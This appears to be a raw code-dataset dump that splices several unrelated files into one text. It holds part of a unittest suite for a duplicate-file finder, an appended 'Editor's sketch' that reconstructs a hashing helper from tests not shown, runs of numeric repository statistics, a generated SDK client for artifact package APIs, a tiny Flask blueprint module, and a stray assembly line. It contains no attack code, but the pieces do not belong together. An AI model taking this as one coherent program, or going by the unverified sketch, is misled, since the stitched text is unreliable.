testDict['IncludeEmptyFiles'] = DEFAULT_INCLUDEEMPTYFILES
testDict['Blocksize'] = DEFAULT_BLOCKSIZE
testDict['HashAlgorithm'] = DEFAULT_HASHALGORITHM
testDict['CSVOutput'] = DEFAULT_CSV
self.assertDictEqual(loadConfigFileScanOptions(rootdir + '\\invalidpath\\invalid-config-path.txt'), testDict)
def test_findDup_NonZero_NoSubDirs(self):
#Only non-zero sized files of any size should be found
dups = {}
results = []
scanOptions = loadDefaultScanOptions()
scanOptions['SubDirs'] = 'FALSE'
filters = []
dups = findDup(rootdir + '\\testfiles', filters, scanOptions)
results = list(filter(lambda x: len(x) > 1, dups.values()))
expectedresults = [[rootdir + '\\testfiles\\bigfile1 - Copy.txt', rootdir + '\\testfiles\\bigfile1.txt'],
[rootdir + '\\testfiles\\file1 - Copy.log', rootdir + '\\testfiles\\file1.log']]
self.assertListEqual(results, expectedresults)
def test_findDup_NonZero_SubDirs(self):
#Only non-zero sized files of any size should be found
dups = {}
results = []
scanOptions = loadDefaultScanOptions()
filters = []
dups = findDup(rootdir + '\\testfiles', filters, scanOptions)
results = list(filter(lambda x: len(x) > 1, dups.values()))
expectedresults = [[rootdir + '\\testfiles\\bigfile1 - Copy.txt', rootdir + '\\testfiles\\bigfile1.txt', rootdir + '\\testfiles\\childdir\\childdir-bigfile1.txt'],
[rootdir + '\\testfiles\\file1 - Copy.log', rootdir + '\\testfiles\\file1.log', rootdir + '\\testfiles\\childdir\\childdir-file1.log']]
self.assertListEqual(results, expectedresults)
def test_findDup_NoSubDirs(self):
#Zero-sized and non-zero sized files of any size should be found
dups = {}
results = []
scanOptions = loadDefaultScanOptions()
scanOptions['IncludeEmptyFiles'] = 'TRUE'
scanOptions['SubDirs'] = 'FALSE'
filters = []
dups = findDup(rootdir + '\\testfiles', filters, scanOptions)
results = list(filter(lambda x: len(x) > 1, dups.values()))
expectedresults = [[rootdir + '\\testfiles\\bigfile1 - Copy.txt', rootdir + '\\testfiles\\bigfile1.txt'],
[rootdir + '\\testfiles\\emptyfile1.txt', rootdir + '\\testfiles\\emptyfile2.txt'],
[rootdir + '\\testfiles\\file1 - Copy.log', rootdir + '\\testfiles\\file1.log']]
self.assertListEqual(results, expectedresults)
def test_findDup_SubDirs(self):
#Zero-sized and non-zero sized files of any size should be found
dups = {}
results = []
scanOptions = loadDefaultScanOptions()
scanOptions['IncludeEmptyFiles'] = 'TRUE'
filters = []
dups = findDup(rootdir + '\\testfiles', filters, scanOptions)
results = list(filter(lambda x: len(x) > 1, dups.values()))
expectedresults = [[rootdir + '\\testfiles\\bigfile1 - Copy.txt', rootdir + '\\testfiles\\bigfile1.txt', rootdir + '\\testfiles\\childdir\\childdir-bigfile1.txt'],
[rootdir + '\\testfiles\\emptyfile1.txt', rootdir + '\\testfiles\\emptyfile2.txt', rootdir + '\\testfiles\\childdir\\childdir-emptyfile1.txt'],
[rootdir + '\\testfiles\\file1 - Copy.log', rootdir + '\\testfiles\\file1.log', rootdir + '\\testfiles\\childdir\\childdir-file1.log']]
self.assertListEqual(results, expectedresults)
def test_findDup_IncludeOnlyLog_NoSubDirs(self):
#Zero-sized and non-zero sized files of any size should be found, but only .log files
dups = {}
results = []
scanOptions = loadDefaultScanOptions()
scanOptions['IncludeEmptyFiles'] = 'TRUE'
scanOptions['FilterMode'] = 'INCLUDE'
scanOptions['SubDirs'] = 'FALSE'
filters = ['*.log']
dups = findDup(rootdir + '\\testfiles', filters, scanOptions)
results = list(filter(lambda x: len(x) > 1, dups.values()))
expectedresults = [[rootdir + '\\testfiles\\file1 - Copy.log', rootdir + '\\testfiles\\file1.log']]
self.assertListEqual(results, expectedresults)
def test_findDup_IncludeOnlyLog_SubDirs(self):
#Zero-sized and non-zero sized files of any size should be found, but only .log files
dups = {}
results = []
scanOptions = loadDefaultScanOptions()
scanOptions['IncludeEmptyFiles'] = 'TRUE'
scanOptions['FilterMode'] = 'INCLUDE'
filters = ['*.log']
dups = findDup(rootdir + '\\testfiles', filters, scanOptions)
results = list(filter(lambda x: len(x) > 1, dups.values()))
expectedresults = [[rootdir + '\\testfiles\\file1 - Copy.log', rootdir + '\\testfiles\\file1.log', rootdir + '\\testfiles\\childdir\\childdir-file1.log']]
self.assertListEqual(results, expectedresults)
def test_findDup_IncludeOnlyTxt_NoSubDirs(self):
#Zero-sized and non-zero sized files of any size should be found, but only .txt files
dups = {}
results = []
scanOptions = loadDefaultScanOptions()
scanOptions['IncludeEmptyFiles'] = 'TRUE'
scanOptions['FilterMode'] = 'INCLUDE'
scanOptions['SubDirs'] = 'FALSE'
filters = ['*.txt']
dups = findDup(rootdir + '\\testfiles', filters, scanOptions)
results = list(filter(lambda x: len(x) > 1, dups.values()))
expectedresults = [[rootdir + '\\testfiles\\bigfile1 - Copy.txt', rootdir + '\\testfiles\\bigfile1.txt'],
[rootdir + '\\testfiles\\emptyfile1.txt', rootdir + '\\testfiles\\emptyfile2.txt']]
self.assertListEqual(results, expectedresults)
def test_findDup_IncludeOnlyTxt_SubDirs(self):
#Zero-sized and non-zero sized files of any size should be found, but only .txt files
dups = {}
results = []
scanOptions = loadDefaultScanOptions()
scanOptions['IncludeEmptyFiles'] = 'TRUE'
scanOptions['FilterMode'] = 'INCLUDE'
filters = ['*.txt']
dups = findDup(rootdir + '\\testfiles', filters, scanOptions)
results = list(filter(lambda x: len(x) > 1, dups.values()))
expectedresults = [[rootdir + '\\testfiles\\bigfile1 - Copy.txt', rootdir + '\\testfiles\\bigfile1.txt', rootdir + '\\testfiles\\childdir\\childdir-bigfile1.txt'],
[rootdir + '\\testfiles\\emptyfile1.txt', rootdir + '\\testfiles\\emptyfile2.txt', rootdir + '\\testfiles\\childdir\\childdir-emptyfile1.txt']]
self.assertListEqual(results, expectedresults)
def test_findDup_MaxSize30000_NoSubDirs(self):
#Zero-sized and non-zero sized files of any size should be found, but only files less than 30,000 bytes
dups = {}
results = []
scanOptions = loadDefaultScanOptions()
scanOptions['IncludeEmptyFiles'] = 'TRUE'
scanOptions['MaxFileSize'] = 30000
scanOptions['SubDirs'] = 'FALSE'
filters = []
dups = findDup(rootdir + '\\testfiles', filters, scanOptions)
results = list(filter(lambda x: len(x) > 1, dups.values()))
expectedresults = [[rootdir + '\\testfiles\\emptyfile1.txt', rootdir + '\\testfiles\\emptyfile2.txt'],
[rootdir + '\\testfiles\\file1 - Copy.log', rootdir + '\\testfiles\\file1.log']]
self.assertListEqual(results, expectedresults)
def test_findDup_MaxSize30000_SubDirs(self):
#Zero-sized and non-zero sized files of any size should be found, but only files less than 30,000 bytes
dups = {}
results = []
scanOptions = loadDefaultScanOptions()
scanOptions['IncludeEmptyFiles'] = 'TRUE'
scanOptions['MaxFileSize'] = 30000
filters = []
dups = findDup(rootdir + '\\testfiles', filters, scanOptions)
results = list(filter(lambda x: len(x) > 1, dups.values()))
expectedresults = [[rootdir + '\\testfiles\\emptyfile1.txt', rootdir + '\\testfiles\\emptyfile2.txt', rootdir + '\\testfiles\\childdir\\childdir-emptyfile1.txt'],
[rootdir + '\\testfiles\\file1 - Copy.log', rootdir + '\\testfiles\\file1.log', rootdir + '\\testfiles\\childdir\\childdir-file1.log']]
self.assertListEqual(results, expectedresults)
def test_loadFiltersValidPath(self):
results = loadFilters(rootdir + '\\include-filters.txt')
expectedresults = ['*.log']
self.assertListEqual(results, expectedresults)
def test_loadFiltersInvalidPath(self):
results = loadFilters('c:\invalid path/**$$')
expectedresults = []
self.assertListEqual(results, expectedresults)
def test_getFiltersNoFiltersBlankNone(self):
expected_results = []
results = getFilters('', None)
self.assertListEqual(results, expected_results)
def test_getFiltersNoFiltersBlankBlank(self):
expected_results = []
results = getFilters('', '')
self.assertListEqual(results, expected_results)
def test_getFiltersNoFiltersNoneBlank(self):
expected_results = []
results = getFilters(None, '')
self.assertListEqual(results, expected_results)
def test_getFiltersNoFiltersNoneNone(self):
expected_results = []
results = getFilters(None, None)
self.assertListEqual(results, expected_results)
def test_getFiltersNoFiltersNoneCmd(self):
expected_results = ['*.csv','*.txt','*.xlsx']
results = getFilters(None, ['*.csv', '*.txt', '*.xlsx'])
self.assertListEqual(results, expected_results)
def test_getFiltersNoFiltersFileNone(self):
expected_results = ['*.log']
results = getFilters(rootdir + '\\include-filters.txt', None)
self.assertListEqual(results, expected_results)
def test_shortenNameNone30(self):
results = shortenName(None, 30)
expected_results = ''
self.assertEqual(results, expected_results)
def test_shortenNameShortStringNone(self):
results = shortenName('abc', None)
expected_results = 'abc'
self.assertEqual(results, expected_results)
def test_shortenNameShortStringBigLength(self):
results = shortenName('abc', 50)
expected_results = 'abc'
self.assertEqual(results, expected_results)
def test_shortenNameEvenString5(self):
results = shortenName('abcdef', 5)
expected_results = 'a...f'
self.assertEqual(results, expected_results)
def test_shortenNameOddString5(self):
results = shortenName('abcdefg', 5)
expected_results = 'a...g'
self.assertEqual(results, expected_results)
def test_padSpaces(self):
results = padSpaces('abc', 5)
expected_results = 'abc '
self.assertEqual(results, expected_results)
def test_padSpacesShortLength(self):
results = padSpaces('abc', 1)
expected_results = 'abc'
self.assertEqual(results, expected_results)
def test_padSpacesNumericString(self):
results = padSpaces(51, 3)
expected_results = '51 '
self.assertEqual(results, expected_results)
def test_padSpacesNegLength(self):
results = padSpaces('abc', -1)
expected_results = 'abc'
self.assertEqual(results, expected_results)
if __name__ == '__main__':
unittest.main()
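# --- Editor's sketch (appended after the test module purely for illustration; this
# is a reconstruction inferred from the getHashAlgorithms assertions above, not the
# actual find_dups implementation): selector bits are 1=MD5, 2=SHA1, 4=SHA224,
# 8=SHA256, 16=SHA384, 32=SHA512, and anything outside 1..63 (or not an integer)
# falls back to MD5 only.
def _get_hash_algorithms_sketch(selector):
    flags = {'useMD5': 1, 'useSHA1': 2, 'useSHA224': 4,
             'useSHA256': 8, 'useSHA384': 16, 'useSHA512': 32}
    if not isinstance(selector, int) or not 1 <= selector <= 63:
        selector = 1  # invalid selections default to MD5, as the tests expect
    return {name: bool(selector & bit) for name, bit in flags.items()}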
| 47.302326
| 526
| 0.662417
| 2,320
| 28,476
| 8.045259
| 0.085776
| 0.07431
| 0.028503
| 0.020573
| 0.808251
| 0.778677
| 0.767479
| 0.740423
| 0.726172
| 0.71176
| 0
| 0.049098
| 0.217517
| 28,476
| 602
| 527
| 47.302326
| 0.788574
| 0.038559
| 0
| 0.742366
| 0
| 0
| 0.222982
| 0.092687
| 0
| 0
| 0
| 0
| 0.103053
| 1
| 0.104962
| false
| 0.001908
| 0.007634
| 0
| 0.114504
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
514b811494ead6936347ec7c6078f20ed38a45ed
| 18,499
|
py
|
Python
|
artifact_sdk/api/pkg/pkg_client.py
|
easyopsapis/easyops-api-python
|
adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0
|
[
"Apache-2.0"
] | 5
|
2019-07-31T04:11:05.000Z
|
2021-01-07T03:23:20.000Z
|
artifact_sdk/api/pkg/pkg_client.py
|
easyopsapis/easyops-api-python
|
adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0
|
[
"Apache-2.0"
] | null | null | null |
artifact_sdk/api/pkg/pkg_client.py
|
easyopsapis/easyops-api-python
|
adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sys
import artifact_sdk.api.pkg.batch_update_package_permission_pb2
import artifact_sdk.api.pkg.create_pb2
import artifact_sdk.model.artifact.package_pb2
import artifact_sdk.api.pkg.delete_package_pb2
import artifact_sdk.api.pkg.get_package_detail_pb2
import artifact_sdk.api.pkg.get_package_permission_pb2
import google.protobuf.empty_pb2
import artifact_sdk.api.pkg.get_user_variables_pb2
import artifact_sdk.api.pkg.search_pb2
import artifact_sdk.api.pkg.up_insert_global_variables_pb2
import artifact_sdk.api.pkg.update_pb2
import artifact_sdk.api.pkg.update_package_permission_pb2
import artifact_sdk.utils.http_util
import google.protobuf.json_format
class PkgClient(object):
def __init__(self, server_ip="", server_port=0, service_name="", host=""):
"""
初始化client
:param server_ip: 指定sdk请求的server_ip,为空时走名字服务路由
:param server_port: 指定sdk请求的server_port,与server_ip一起使用, 为空时走名字服务路由
:param service_name: 指定sdk请求的service_name, 为空时按契约名称路由。如果server_ip和service_name同时设置,server_ip优先级更高
:param host: 指定sdk请求服务的host名称, 如cmdb.easyops-only.com
"""
if server_ip == "" and server_port != 0 or server_ip != "" and server_port == 0:
raise Exception("server_ip和server_port必须同时指定")
self._server_ip = server_ip
self._server_port = server_port
self._service_name = service_name
self._host = host
def batch_update_package_permission(self, request, org, user, timeout=10):
# type: (artifact_sdk.api.pkg.batch_update_package_permission_pb2.BatchUpdatePackagePermissionRequest, int, str, int) -> artifact_sdk.api.pkg.batch_update_package_permission_pb2.BatchUpdatePackagePermissionResponse
"""
批量修改包权限信息
:param request: batch_update_package_permission请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: artifact_sdk.api.pkg.batch_update_package_permission_pb2.BatchUpdatePackagePermissionResponse
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.artifact.pkg.BatchUpdatePackagePermission"
uri = "/permission/packages"
requestParam = request
rsp_obj = artifact_sdk.utils.http_util.do_api_request(
method="POST",
src_name="logic.artifact_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = artifact_sdk.api.pkg.batch_update_package_permission_pb2.BatchUpdatePackagePermissionResponse()
google.protobuf.json_format.ParseDict(rsp_obj["data"], rsp, ignore_unknown_fields=True)
return rsp
def create(self, request, org, user, timeout=10):
# type: (artifact_sdk.api.pkg.create_pb2.CreateRequest, int, str, int) -> artifact_sdk.model.artifact.package_pb2.Package
"""
创建包
:param request: create请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: artifact_sdk.model.artifact.package_pb2.Package
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.artifact.pkg.Create"
uri = "/package"
requestParam = request
rsp_obj = artifact_sdk.utils.http_util.do_api_request(
method="POST",
src_name="logic.artifact_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = artifact_sdk.model.artifact.package_pb2.Package()
google.protobuf.json_format.ParseDict(rsp_obj["data"], rsp, ignore_unknown_fields=True)
return rsp
def delete_package(self, request, org, user, timeout=10):
# type: (artifact_sdk.api.pkg.delete_package_pb2.DeletePackageRequest, int, str, int) -> artifact_sdk.api.pkg.delete_package_pb2.DeletePackageResponse
"""
删除包
:param request: delete_package请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: artifact_sdk.api.pkg.delete_package_pb2.DeletePackageResponse
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.artifact.pkg.DeletePackage"
uri = "/package/package/{packageId}".format(
packageId=request.packageId,
)
requestParam = request
rsp_obj = artifact_sdk.utils.http_util.do_api_request(
method="DELETE",
src_name="logic.artifact_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = artifact_sdk.api.pkg.delete_package_pb2.DeletePackageResponse()
google.protobuf.json_format.ParseDict(rsp_obj["data"], rsp, ignore_unknown_fields=True)
return rsp
def get_package_detail(self, request, org, user, timeout=10):
# type: (artifact_sdk.api.pkg.get_package_detail_pb2.GetPackageDetailRequest, int, str, int) -> artifact_sdk.model.artifact.package_pb2.Package
"""
获取包详情信息
:param request: get_package_detail请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: artifact_sdk.model.artifact.package_pb2.Package
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.artifact.pkg.GetPackageDetail"
uri = "/package/{packageId}".format(
packageId=request.packageId,
)
requestParam = request
rsp_obj = artifact_sdk.utils.http_util.do_api_request(
method="GET",
src_name="logic.artifact_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = artifact_sdk.model.artifact.package_pb2.Package()
google.protobuf.json_format.ParseDict(rsp_obj["data"], rsp, ignore_unknown_fields=True)
return rsp
def get_package_permission(self, request, org, user, timeout=10):
# type: (artifact_sdk.api.pkg.get_package_permission_pb2.GetPackagePermissionRequest, int, str, int) -> artifact_sdk.model.artifact.package_pb2.Package
"""
获取包权限信息
:param request: get_package_permission请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: artifact_sdk.model.artifact.package_pb2.Package
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.artifact.pkg.GetPackagePermission"
uri = "/permission/package/{packageId}".format(
packageId=request.packageId,
)
requestParam = request
rsp_obj = artifact_sdk.utils.http_util.do_api_request(
method="GET",
src_name="logic.artifact_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = artifact_sdk.model.artifact.package_pb2.Package()
google.protobuf.json_format.ParseDict(rsp_obj["data"], rsp, ignore_unknown_fields=True)
return rsp
def get_user_variables(self, request, org, user, timeout=10):
# type: (google.protobuf.empty_pb2.Empty, int, str, int) -> artifact_sdk.api.pkg.get_user_variables_pb2.GetUserVariablesResponse
"""
获取程序包的用户变量
:param request: get_user_variables请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: artifact_sdk.api.pkg.get_user_variables_pb2.GetUserVariablesResponse
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.artifact.pkg.GetUserVariables"
uri = "/userGlobalVars"
requestParam = request
rsp_obj = artifact_sdk.utils.http_util.do_api_request(
method="GET",
src_name="logic.artifact_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = artifact_sdk.api.pkg.get_user_variables_pb2.GetUserVariablesResponse()
google.protobuf.json_format.ParseDict(rsp_obj["data"], rsp, ignore_unknown_fields=True)
return rsp
def init_package_permission(self, request, org, user, timeout=10):
# type: (google.protobuf.empty_pb2.Empty, int, str, int) -> google.protobuf.empty_pb2.Empty
"""
初始化包权限
:param request: init_package_permission请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: google.protobuf.empty_pb2.Empty
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.artifact.pkg.InitPackagePermission"
uri = "/operation/InitPermissionDb"
requestParam = request
rsp_obj = artifact_sdk.utils.http_util.do_api_request(
method="POST",
src_name="logic.artifact_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = google.protobuf.empty_pb2.Empty()
google.protobuf.json_format.ParseDict(rsp_obj, rsp, ignore_unknown_fields=True)
return rsp
def search(self, request, org, user, timeout=10):
# type: (artifact_sdk.api.pkg.search_pb2.SearchRequest, int, str, int) -> artifact_sdk.api.pkg.search_pb2.SearchResponse
"""
搜索包
:param request: search请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: artifact_sdk.api.pkg.search_pb2.SearchResponse
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.artifact.pkg.Search"
uri = "/package/search"
requestParam = request
rsp_obj = artifact_sdk.utils.http_util.do_api_request(
method="GET",
src_name="logic.artifact_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = artifact_sdk.api.pkg.search_pb2.SearchResponse()
google.protobuf.json_format.ParseDict(rsp_obj["data"], rsp, ignore_unknown_fields=True)
return rsp
def up_insert_global_variables(self, request, org, user, timeout=10):
# type: (artifact_sdk.api.pkg.up_insert_global_variables_pb2.UpInsertGlobalVariablesRequest, int, str, int) -> google.protobuf.empty_pb2.Empty
"""
修改全局变量
:param request: up_insert_global_variables请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: google.protobuf.empty_pb2.Empty
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.artifact.pkg.UpInsertGlobalVariables"
uri = "/userGlobalVars"
requestParam = request
rsp_obj = artifact_sdk.utils.http_util.do_api_request(
method="POST",
src_name="logic.artifact_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = google.protobuf.empty_pb2.Empty()
google.protobuf.json_format.ParseDict(rsp_obj, rsp, ignore_unknown_fields=True)
return rsp
def update(self, request, org, user, timeout=10):
# type: (artifact_sdk.api.pkg.update_pb2.UpdateRequest, int, str, int) -> artifact_sdk.api.pkg.update_pb2.UpdateResponse
"""
更新包信息
:param request: update请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: artifact_sdk.api.pkg.update_pb2.UpdateResponse
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.artifact.pkg.Update"
uri = "/package/{packageId}".format(
packageId=request.packageId,
)
requestParam = request
rsp_obj = artifact_sdk.utils.http_util.do_api_request(
method="PUT",
src_name="logic.artifact_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = artifact_sdk.api.pkg.update_pb2.UpdateResponse()
google.protobuf.json_format.ParseDict(rsp_obj, rsp, ignore_unknown_fields=True)
return rsp
def update_package_permission(self, request, org, user, timeout=10):
# type: (artifact_sdk.api.pkg.update_package_permission_pb2.UpdatePackagePermissionRequest, int, str, int) -> google.protobuf.empty_pb2.Empty
"""
修改包权限信息
:param request: update_package_permission请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: google.protobuf.empty_pb2.Empty
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.artifact.pkg.UpdatePackagePermission"
uri = "/permission/package"
requestParam = request
rsp_obj = artifact_sdk.utils.http_util.do_api_request(
method="POST",
src_name="logic.artifact_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = google.protobuf.empty_pb2.Empty()
google.protobuf.json_format.ParseDict(rsp_obj, rsp, ignore_unknown_fields=True)
return rsp
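# --- Hedged usage sketch (not part of pkg_client.py) ------------------------
# Shows how the generated client above is typically called; the org number,
# username and the field set on CreateRequest are made-up placeholders, and a
# reachable easyops gateway is assumed.
import artifact_sdk.api.pkg.create_pb2
from artifact_sdk.api.pkg.pkg_client import PkgClient
client = PkgClient(host="cmdb.easyops-only.com")   # empty server_ip/port: route by contract name
req = artifact_sdk.api.pkg.create_pb2.CreateRequest()
req.name = "demo-package"                          # hypothetical field on CreateRequest
pkg = client.create(req, org=12345, user="demo-user", timeout=10)
print(pkg)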
| 37.371717
| 222
| 0.616844
| 2,013
| 18,499
| 5.370094
| 0.076503
| 0.068178
| 0.044033
| 0.053469
| 0.874746
| 0.872988
| 0.86198
| 0.827382
| 0.785106
| 0.756337
| 0
| 0.006231
| 0.28861
| 18,499
| 494
| 223
| 37.447368
| 0.815198
| 0.205092
| 0
| 0.764151
| 0
| 0
| 0.074722
| 0.040588
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037736
| false
| 0
| 0.050314
| 0
| 0.125786
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cfa1dbad3edd5596e9e07fcfb63ee21c2eb61e89
| 120
|
py
|
Python
|
mathsonmars/main/__init__.py
|
adriangrepo/mathsonmars
|
3c3dfeb5b23e29d1b4e21c3189972f298f69ce07
|
[
"MIT"
] | null | null | null |
mathsonmars/main/__init__.py
|
adriangrepo/mathsonmars
|
3c3dfeb5b23e29d1b4e21c3189972f298f69ce07
|
[
"MIT"
] | null | null | null |
mathsonmars/main/__init__.py
|
adriangrepo/mathsonmars
|
3c3dfeb5b23e29d1b4e21c3189972f298f69ce07
|
[
"MIT"
] | null | null | null |
from flask import Blueprint
main_view = Blueprint('main_view', __name__)
from mathsonmars.main import mainview, errors
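# --- Hedged sketch (not from the original repository) -----------------------
# Typical wiring of the blueprint above into an application factory; the
# create_app name is an assumption, not code taken from mathsonmars.
from flask import Flask
from mathsonmars.main import main_view
def create_app():
    app = Flask(__name__)
    app.register_blueprint(main_view)   # exposes the views declared in mainview/errors
    return app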
| 24
| 45
| 0.816667
| 16
| 120
| 5.75
| 0.625
| 0.282609
| 0.369565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116667
| 120
| 5
| 45
| 24
| 0.867925
| 0
| 0
| 0
| 0
| 0
| 0.07438
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
cfa9e111c581beaf78c04370495eb4fad2da5dd6
| 13
|
py
|
Python
|
f33a20ca-bdf3-4af6-b421-23fdae27107b/dccd6955-85e6-4083-8717-c7692b6a2e22.py
|
copyleftdev/top_contrib_lol
|
362a5849b04dc2b52a9b0da138d4e9a32eade207
|
[
"Apache-2.0"
] | null | null | null |
f33a20ca-bdf3-4af6-b421-23fdae27107b/dccd6955-85e6-4083-8717-c7692b6a2e22.py
|
copyleftdev/top_contrib_lol
|
362a5849b04dc2b52a9b0da138d4e9a32eade207
|
[
"Apache-2.0"
] | null | null | null |
f33a20ca-bdf3-4af6-b421-23fdae27107b/dccd6955-85e6-4083-8717-c7692b6a2e22.py
|
copyleftdev/top_contrib_lol
|
362a5849b04dc2b52a9b0da138d4e9a32eade207
|
[
"Apache-2.0"
] | null | null | null |
[ORG 0x7C00]
| 6.5
| 12
| 0.692308
| 2
| 13
| 4.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.363636
| 0.153846
| 13
| 1
| 13
| 13
| 0.454545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.461538
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
320b04e2e0c22a947b4bb91bb90a6d6d5babdf36
| 11,732
|
py
|
Python
|
tests/trestle/tasks/osco_to_oscal_test.py
|
